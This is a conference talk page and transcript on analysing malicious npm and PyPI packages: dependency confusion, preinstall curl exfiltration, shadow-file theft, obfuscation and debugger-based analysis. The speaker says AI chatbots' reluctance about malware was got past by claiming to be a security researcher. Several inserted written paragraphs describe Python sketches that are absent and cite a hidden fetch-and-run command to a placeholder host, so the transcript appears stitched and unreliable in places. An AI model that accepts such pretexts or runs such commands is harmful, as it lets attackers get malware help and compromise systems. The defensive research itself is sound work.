Dissecting Open Source Malware: From PoCs to Payloads

Name: Dissecting Open Source Malware: From PoCs to Payloads
Uploaded: 2025-10-12
Duration: 25 min 54 s

BSides Toronto · 2025 · 25:54 · 92 views · Published 2025-10

Speakers

Juan Aguirre

Tags

Category: Technical

Topic: Malware Analysis, Reverse Engineering, Supply Chain Security

Team: Red

Style: Talk

About this talk

Juan Aguirre explores how open source packages in npm and PyPI have evolved from harmless proof-of-concepts into weaponized malware—credential stealers, backdoors, and remote access trojans distributed through legitimate-looking dependencies. The talk walks through real-world examples, obfuscation techniques, and practical workflows for analyzing these threats using static and dynamic analysis.

Original YouTube description

Juan Aguirre poses the question: are malicious packages hiding in plain sight? Welcome to modern open source ecosystems. This talk explores how open source code, once limited to harmless PoCs and bug bounty tools, is increasingly being weaponized as real malware in the npm and PyPI ecosystems. We’ll walk through how these threats have evolved, dive into real examples, and show how you can analyze and understand them, even when they try to hide behind layers of obfuscation. Open source malware has rapidly evolved from harmless scripts into fully operational payloads, stealing credentials, exfiltrating data, dropping binaries, and deploying RATs through packages that look just like any other dependency. In this talk, they explore that evolution and how attackers are using npm and PyPI as distribution channels for info stealers, backdoors, and more. They demo a few real-world examples and walk through their approach to analyzing them, focusing on source-level static analysis with a touch of dynamic behaviour inspection in a controlled environment. They also look at some basic obfuscation techniques and show how to cut through them using simple but effective workflows. Whether you’re a developer, researcher, or just malware-curious, you’ll walk away with a better understanding of how these threats operate and how to start pulling them apart. Don’t trust your package.json or requirements.txt blindly. Get curious, dig in, and help raise the bar for supply chain security.

Transcript [en]

Thank you. All right. Hello everybody. Thank you for sticking around. It's great to see you all here. Thank you, BSides, for having me. So today we're going to dive in and talk about open source malware, dissecting it a little bit and seeing the evolution that I've been able to see while working, from basic PoCs to fully weaponized payloads. And it's pretty cool. So let's dive in. First, a quick who am I. My name is Juan Aguirre. I'm a security researcher currently at Safety CLI, formerly PyUp.io. You might have heard of that one. I work mostly in supply chain security. The last couple of years I've been specializing in that. So I think

this last talk by Pav was actually a great segue right into this because, you know, we have some mention of SBOMs as well. But mostly my passion has always been offensive security and malware. I think that's where all the fun stuff is when you're in security. There's a lot to do, but the offensive side is just so much fun. I also love leadership. I have a passion for that. And then outside of work, I just love being outside in nature, taking some hikes. I love that as much as I can, especially now in this fall era. It's great to see the colors. So, what is open source malware? Let's

first talk a little bit about that. When we talk about the open source space, we've got to understand there are two basic roads of security impact. We have accidentally vulnerable, which is what we're more used to seeing, right? We see the CVE, that's accidentally vulnerable, right? All these vulnerabilities that come out and affect open source, that's one avenue. And that is just a bug that was introduced in the code that has a security impact, meaning it affects either the confidentiality, integrity, or availability of a system or subsequent systems. And then we have the intentionally malicious, which is pretty much the same thing. There's a bug that was introduced, but now it was introduced on purpose to maliciously

affect one of these security impacts, right? The security triad: confidentiality, integrity, and availability. So it might steal some information, or it might just break down the whole system, something like that. So it's malware that is intentionally published in an open source repository. And what are the motivations behind this? Well, we have bug bounty. That's a very popular one. Trolling. The amount of rickrolls I've seen in malware... it's always funny when you open up a malware sample, you want to see what it is, and, you know what I'm talking about, it just opens up YouTube and there's Rick Astley dancing away to Never

Gonna Give You... I apologize for my voice. And then the fun ones, monetization and espionage, those are the truly good ones. So how does this get into my pipeline? How do they get into my system? Right. First let's talk about the initial compromise. So how do these malicious packages, how does this malware, get into an open source repository? There are two main avenues. There are a lot more, but there's malicious from birth, meaning a malicious actor created an account in one of these open source repositories, created a package, and published it malicious from birth, first version malicious. Sometimes they even try to hide it a little bit. So, the

first couple of versions don't really do much. Maybe it does what the README says it should do, but by the third or fourth version, you see they put in the payload. You see them inject malicious behavior, all that in there. And the other avenue is account takeovers, which have been very, very popular. Why does an account takeover happen? We have poor security either on the repository side, like npm, we've seen some flaws with that in the past, or the developers, the maintainers, just have poor security: they don't rotate passwords, don't have 2FA set up. And then there are also namespace takeovers, right? So in certain repositories I can have packages scoped to a certain namespace, which

gives me a little bit more credibility. So imagine I'm going to npm and I see a package that's @microsoft/azure-cli. I see that and I'm like, "Oh, that's probably legit. That looks more legit than anything." But it turns out I don't really need anything to claim that Microsoft namespace. Right now, of course, somebody has it. I'm not going to get Microsoft. That's too popular. But just as an example, if it wasn't claimed, I can just claim it. And you'd think that maybe I need a Microsoft domain account to authenticate it, but you don't. So you can just take the namespace and then start publishing your packages scoped so that they look pretty

legit. And then finally phishing. That's probably one of my favorite ones just because it works so well. Social engineering just works. You'd think that by this day and age people would be a little more privy to it, but at the end of the day these attacks are so well put together that it works, right? We saw an example before where we saw a Microsoft login. They looked exactly identical and it's just so easy to follow. So now we have the package in the repository. How does it get into my pipeline? How does it get into my computer? It does so by a couple of avenues, but these are the two main

ones. Typosquats. So an attacker is going to leverage that, you know, we're rushing, we're writing our code, we're doing an npm install, we don't even look at the keyboard, we're just typing away. Maybe it's the morning, we haven't had our coffee. I'm not really a coffee person, so maybe I haven't had my water or my Coke, like Coca-Cola Coke. Right. So maybe I just fat-fingered something and instead of writing colors.js, I forgot the dot and I put colorsjs. Turns out that's a malicious package. So there are very simple mistakes that I can make, and a typo gets me a malicious package right

into my system. But there's also dependency confusion, which we're going to talk a little bit more about later. This just marked a new era of possibilities. Dependency confusion leverages how these repository managers deal with public and private versions of a package and which takes precedence, right? It flooded ecosystems. What really happens is this: say you're using a private package. I work at Safety, so let's say I have a package called safety-utils that we use internally and it's hosted in our private repository, right? If I do an npm install and it turns out that

somebody published that safety-utils to npm as well, it's going to go fetch at npm and then it'll look at my private one. But which one does it choose if it's available in both? Well, it turns out that it always takes, supposedly for security reasons, the highest version one. So this is where we started seeing a lot of attackers publish packages at 999.99.9, right? You see a version that looks crazy, like 999.99.9, and this is the reason: to make sure it gets into your pipeline. And finally, it's in the pipeline. It's in my PC. How does it actually execute code? How does it put through that

malicious behavior it wants to carry out? Install scripts and setup scripts. That's the attackers' bread and butter. They just love this. So again, throwing some shade on npm. A lot of the examples are npm. If I do an npm install, I can have preinstall scripts in my package.json, or postinstall scripts, and without me really noticing, under the hood the script can run, do the malicious behavior, and it'll still install the package. So, you know, unbeknownst to me, I just got infected and I have no idea. Or worms, too: they can spread, which we saw in September. This was awesome. If you haven't seen it, you can look it up. The

Shai-Hulud attacks. Just search that keyword and you'll see a lot about it. It compromised hundreds of packages. You know, CrowdStrike fell in there. So many organizations were affected. And it was really cool because the way this was spreading was that it got a bunch of personal access tokens on GitHub. It would get on the repository, see what that access token had access to, what repositories, and would kind of clone itself onto everything and, via GitHub Actions, do the same thing, just exfiltrate data. And it was just so easy, so fun. This is the GitHub Action it actually used to exfiltrate the data, which you see is just so simple. It's just pretty much a

curl to some webhook. Although it turns out the attackers didn't pay for the webhook. They were using a free one. So after the first couple of tens or hundreds of packages were affected, it just stopped responding, because, oh, you reached your quota for the month, right? You've got to pay up. So if you're an attacker, make sure you use the paid version. Next, we've got the evolution. This is the real meat and bones of it. How does it go from PoCs and bug bounties, which are essentially harmless, although we're going to see not all of them are, to prankware and protestware, then to stealers, and eventually to

droppers and remote access trojans, which are the real serious stuff, right? We're going to dive right into some examples. So first we have the innocent stealer. This is kind of like one of the first bug bounty PoCs. This is the format they had. So this is a package.json for a package, better help, right, at 999.99.99. We see this from dependency confusion, likely leveraging that. And we see the preinstall script again right here. The preinstall is just a curl request, right? And it's sending what out? It's sending whoami, so like the user ID, hostname, and current working directory. That's innocent enough. It's not really taking anything too sensitive. It's probably just enough for

me to claim my bounty and prove that, hey, I can execute code in your system. But then we saw Alex Birsan come out with the dependency confusion research. Shout out to Alex. Amazing research. This was back in like 2021, I want to say. I forget. But he put out this template, which we see here is the same thing, just a little more nicely written. So the package.json now has main index.js, and this would be your index, where it just has a couple of imports, requires, and then we have the tracking data that it's stealing: home directory, hostname, user. Again, nothing too bad. And again it just makes a request to an

oastify, which is like a Burp repeater. It just sends it out, I get my bounty, and I'm done. And it was actually funny because after this we saw some attackers that were really lazy flooding the ecosystems. Alex Birsan had his comments, like, "Alex Birsan, for security research purposes, contact me if you see this." And attackers were just copy-pasting that and not even taking out the Alex Birsan part. They just switched the URL to their own Burp repeaters, but they wouldn't even take the time to, like, hey, let's remove this guy out of my PoC. No, but you know, a quick bounty, I guess. But not all of them are so innocent. We

got some spicy ones too, where they start to bring up the heat. It claims it's for security research purposes, but hey, when we look at line five, it's like, wait a minute, you're taking my shadow file, right? So why are you going to take my shadow file? You just want to prove a bounty. That's a little bit over the limit. I don't want my password hashes just out there. That's a compromise. That's a serious risk. And then we got a lot of crypto stealers. This is something we see a lot. Crypto, that's the new currency of the internet, and attackers love it, right? It's easy to launder, easy to

move around. And that's what we started seeing. This one was actually pretty fun because it didn't really have malicious code within the package, but it did have a link to a smart contract. We see the smart contract address right up here. So you read this and you're like, hey, it doesn't look too bad, but then you see the smart contract that it's pulling down, and they were leveraging the smart contract to download the malicious code into your system. So now the smart contract was executing malicious actions. So not all is as it seems, and you've got to be really careful with what you're putting into your systems. That's where the SBOM comes into play. Software bill of

materials: you've got to know what's going in there. But then attackers are also getting tired of being stopped and spotted all the time. So obfuscation comes into play. How do I hide my intent a little bit so that researchers don't really see it, organizations don't really see it? How do I get by that? And we have some basic ones. These are probably the main ones that we see. We see some encodings like Base64, ROT13, UTF-16. One of my favorite ones was UTF-16, where I had a package and I had no idea what it was doing, because it's this file that you can't really read, and you put it through online deobfuscators and

it wasn't really getting me anything. And then I saw a Reddit post. You know, I was just googling parts of the code and seeing what came up, and I saw a Reddit post talking about UTF-16. So all I did was open that same file in my Sublime, my note-taker, whatever, and save it as UTF-16. Lo and behold, all of a sudden I have readable code. Turns out it's malicious. We see variable expansion, which we usually see used to hide PowerShell commands. This is a fun one. I love when I see this because once you've seen it once or twice it's easy enough to recognize, and then it's a

little bit fun to play around with it, and, you know, it's like solving a puzzle. You just put the pieces together, substitute here or there, and you get your PowerShell command that's probably pulling down an executable from somewhere. We see multiple eval chains. This is another fun one, where you just see an eval and this blob of unreadable things. I have no idea what's happening there. But of course, I don't want to execute an eval. I just don't want to do that. But it turns out that if I replace the eval with a print or a console.log, I can reverse that. So you swap in a print, run it in a safe

environment, of course, and I just get another eval with another big blob. Like, oh, wait a minute. So I replace the eval again with another print and I get another eval. But if you do that four or five times, eventually you end up with readable code. Just straight-out malicious code, malicious intent. Variable renaming. This is where it gets a little bit more serious, right? String splitting, dynamic concatenation. These are the truly most common obfuscation techniques, and they're really harder to get by. Or just droppers, where you just see it reaching out to a URL and grabbing a binary, which doesn't really come with source code, then download and execute. How do we solve this

problem then, right? As a researcher, as a malware analyst, what do we do with these? Well, we have a bunch of tools online. Those are some of my favorites up there. I'll share the slides afterwards as well. AI: now with the boom of AI, why not leverage it for our benefit? And it's been pretty good. I've had good results with both ChatGPT and Claude. They've been pretty good at, you know, you give it a package. Sometimes they're a bit hesitant to give you any answers on malicious code, but if you do a little bit of prompt engineering, you explain to it that, hey, you know, I'm a security researcher. I have good

intentions. It's like a little kid. It's just innocent. It lets you by and it gives you all you need. So it helps you out, and they've been really good at figuring out what obfuscated code is doing. Or dynamic analysis: put a safe environment together, a VM, put a debugger in there, you know, do something to trace logs, maybe set up a FakeNet so you can see the network calls and simulate the environment more realistically. And that's a lot more fun to do. So we have this obfuscated RAT here, where we see this line that's highlighted, right? It just says corecho and then bytes from hex something. We see in the imports that corecho is

actually os. They're importing system from os, right? They're trying to be smart and calling it corecho, so that maybe some basic tools don't detect it. Maybe at first look I don't really pay too much attention to it. But it turns out that if I just copy that code, right, and I replace the corecho with a print and run that, I get what we see down here. That's again another curl to a Pastebin. Anytime you see Pastebin in anything, you immediately know, okay, I'm screwed. Turn everything off, unplug the cables, run, set it on fire, whatever. Right. So this is a good one. And then this was actually what that Pastebin was pulling down. So, remote

access trojan. It's pretty cool because it's written in Python. A lot of those just pull a binary from somewhere. This one was actually pulling down a Python script. A couple of key things here. There's a lot of Spanish in it: Spanish keywords, Spanish comments. But hey, if I'm a smart adversary, a malicious actor, I might intentionally put it in Spanish without knowing a single word of Spanish. Why? So that when someone is catching this and analyzing it, they're thinking, hey, attribution, probably a Spanish-speaking country, and I'm on the other side of the world. So you can't take everything for what it is either, right? We see an obfuscated crypto stealer. This is kind of like that variable

renaming, string splitting, and concatenation, where I read this and I have no idea what's going on. I just don't. But I know it's likely not good. However, I do want to state that there are legitimate reasons to obfuscate code, and obfuscation does not mean malicious. There are a lot of organizations that just want to hide a little bit of business logic. They don't want to have it all in there. So, we're going to see what that example really looks like.
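The hex trick from a moment ago, where os.system hides behind an alias and the command sits inside a bytes.fromhex call, can be unpicked without running anything. Below is a minimal sketch in Python, assuming the sample line has that shape. The alias `runner`, the hidden command, and the example.invalid URL are all made up for illustration and are not taken from the sample shown in the talk.

```python
import re

# Hypothetical stand-in for the obfuscated line on the slide.
# The sample is built from plaintext here so the example stays harmless and self-checking.
HIDDEN = "curl -s https://example.invalid/x | sh"
SAMPLE = f'runner(bytes.fromhex("{HIDDEN.encode().hex()}").decode())'

# Matches bytes.fromhex("...") with a quoted hex literal as its argument.
HEX_CALL = re.compile(r'bytes\.fromhex\(\s*["\']([0-9a-fA-F\s]+)["\']\s*\)')


def decode_hex_arguments(source: str) -> list[str]:
    """Return the decoded text of every bytes.fromhex("...") literal in source.

    Nothing is executed: the hex string is only converted back to text,
    which is the static equivalent of swapping the aliased os.system for print.
    """
    decoded = []
    for match in HEX_CALL.finditer(source):
        raw = bytes.fromhex(match.group(1))
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded


if __name__ == "__main__":
    for command in decode_hex_arguments(SAMPLE):
        print(command)
```

Working on the source text rather than importing the sample keeps the analysis static, so the aliased call never gets a chance to run.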

So let's log into my VM here.
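The stacked-eval trick mentioned earlier can be handled the same way, by decoding each layer rather than running it. Here is a rough sketch in Python, assuming every layer has exactly the shape `exec(base64.b64decode("..."))`. Real samples vary in encoding and wrapper, and the helper `wrap` exists only to build a harmless test input.

```python
import base64
import re

# One wrapper layer: exec(...) or eval(...) around base64.b64decode("<literal>").
LAYER = re.compile(
    r'^\s*(?:exec|eval)\(\s*base64\.b64decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*$'
)


def wrap(code: str, layers: int) -> str:
    """Build a hypothetical sample by nesting code inside exec/base64 layers."""
    for _ in range(layers):
        encoded = base64.b64encode(code.encode()).decode()
        code = f'exec(base64.b64decode("{encoded}"))'
    return code


def peel(source: str, max_layers: int = 20) -> tuple[str, int]:
    """Decode nested wrapper layers without executing them.

    Returns the innermost text and the number of layers removed.
    max_layers is a safety cap so a pathological input cannot loop forever.
    """
    depth = 0
    while depth < max_layers:
        match = LAYER.match(source)
        if match is None:
            break  # no more wrapper layers: this is the readable code
        source = base64.b64decode(match.group(1)).decode("utf-8", errors="replace")
        depth += 1
    return source, depth


if __name__ == "__main__":
    sample = wrap("print('payload')", layers=4)
    code, depth = peel(sample)
    print(f"peeled {depth} layers: {code}")
```

This is the print-instead-of-eval loop done four or five times in one go. Anything that does not match the assumed wrapper shape is returned untouched for manual review.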

So what I have here is I copied the obfuscated code that we have and put it into my VM. And the good thing about attaching a debugger to it is that if we're talking about Node, you know, JavaScript, I can write the keyword debugger anywhere that looks interesting and it puts a breakpoint there. So it makes it easy for me, right? For time purposes, I'm going to run through this a little bit quicker. So all I have to do is node inspect, which is a debugger. It's fun. It's easy. And then my JS file that I want to inspect, and then it starts, it attaches a debugger, and I can do a lot of things

with it, right? I can go next. I can step into it with s. I can step out of it with o. I can just type c so it continues to the next breakpoint. So we're going to start stepping over this a little bit and see what's going on. It's also good at the same time to have the code open somewhere like here, where you can follow along. We can see that the debugger is telling me, hey, you're on line six. I can go see what line six says, and am I interested in that, am I not, we'll take a look

but eventually I get somewhere like this. The debugger... this is my breakpoint, but I want to go to the next one and show you the good one. So I just keep stepping through it and I get to my next breakpoint, line 472. So if I go to line 472, it's like, all these things are happening. Look at all these strings. What is that? I probably want to know. I want to find out. And all this is doing is that up top it's defining an array, which we see right here, and it's filling it with all these keywords and all these things. So I want to know what that is. That looks

interesting. It looks important. So I'm going to go and, I have a little cheat note here so that it's easier for me, and I can do console.log of that. My copy-paste didn't work, so let me just write it down. B A16 EF and the word is WG.

And I typed something wrong somewhere. So, let's try that again. BA 16 EF

underscore. Yes, thank you. So, there we go. What was that string? Turns out it's a Bitcoin Cash address. And there's a lot more in there. So this was that smart contract stealer that I showed you before, when it downloads a whole bunch of things. It was looking for where transactions were happening, injecting itself in the middle, and sending that to the attacker's wallet. So when it's not really clear what other avenues I have, doing this dynamic analysis takes me there. So this is really good. So finally, to close it off, this is what the workflow kind of looks like. Do some deobfuscation, see what I can find out. Static analysis should just

kind of be my first avenue. Read the code. We're talking about open source, so we always have access to the code, even if it's obfuscated. Read the code. Take your time. Understand it. See what's happening. And then finally, dynamic analysis in a safe environment. That's one of the most fun things to do. Just play around with the code. Run it. See what happens. Observe. That's half the fun of the research. What's next? Well, we're going to continue to see the line blur between PoCs and real threats. Every day it's thinner and thinner. We're going to see a lot of crypto stealers. This is just very popular. And increasing sophistication in the attacks. These remote access

trojans get fancier and fancier every time, with persistence mechanisms, anti-debug, a lot of things. Some of the key takeaways we need to understand here: open source repositories are definitely part of the threat landscape. The supply chain is important. What we put into our code is very important, right? Since we're just using dependencies, it's very easy to import something at the top and use it without even looking at it. But we need to trust and verify, right? You need to verify anything you're putting in there. Anyone can start analyzing these following that kind of basic workflow. Look at the code, play around with it, and it's good. So don't just trust your dependencies. Analyze,

verify, and contribute to keeping the system secure, the ecosystem secure. Thank you. >> Thank you, Juan. I think we have time for one question. No, it doesn't look like we have any questions. Oh, there we go. Yes, go ahead. >> Do you have any advice for companies that might be new to securing their open

>> 100%. And so the question is what advice do we have for companies so that they can secure their systems a little bit when they don't have too much experience. I think our previous speaker hit it spot on. Software bill of materials. You need to know what you have in your code first. So that's kind of my start: I know what's in there. I have a list of dependencies and things that I'm using. And then, you know, we can leverage these repository managers and all these other tools. There's SAS tools that can help me keep that up to date, can help me identify, hey, this dependency just got a CVE published. So I probably want

to update it, see if there are any breaking changes. How do I update that? So: software bill of materials, repository managers, so you're not doing everything manually. And just be mindful of what you're putting in your code. Awesome. Thank you everybody. And if there are more questions, I'll be around. You can come up. >> Thank you. >> Thank you.
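The advice in that last answer, knowing what is in your code first, can start very small. Here is a minimal sketch in Python, assuming an npm project with a local node_modules directory. It lists every installed package and marks the ones that declare install-time hooks or carry a very high major version, the two indicators from the earlier examples. It is not a real SBOM format, the function names are hypothetical, and the version threshold is an arbitrary assumption.

```python
import json
from pathlib import Path

# npm lifecycle scripts that run automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def looks_inflated(version: str, threshold: int = 99) -> bool:
    """Heuristic only: a very high major version such as 999.99.9.

    The threshold is an arbitrary assumption, not a published rule.
    """
    major = version.split(".", 1)[0]
    return major.isdigit() and int(major) >= threshold


def inventory(node_modules: Path) -> list[dict]:
    """List name, version, install hooks and version flag for each package.json found."""
    rows = []
    if not node_modules.is_dir():
        return rows
    for manifest in sorted(node_modules.rglob("package.json")):
        try:
            data = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip instead of crashing
        if not isinstance(data, dict) or "name" not in data:
            continue
        scripts = data.get("scripts")
        if not isinstance(scripts, dict):
            scripts = {}
        version = str(data.get("version", ""))
        rows.append({
            "name": data["name"],
            "version": version,
            "hooks": {k: scripts[k] for k in INSTALL_HOOKS if k in scripts},
            "high_version": looks_inflated(version),
        })
    return rows


if __name__ == "__main__":
    for row in inventory(Path("node_modules")):
        flag = "  <-- review" if row["hooks"] or row["high_version"] else ""
        print(f'{row["name"]}@{row["version"]}{flag}')
```

A flag here only means "read this one first". Plenty of legitimate packages use install hooks, so the output is a reading list, not a verdict.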
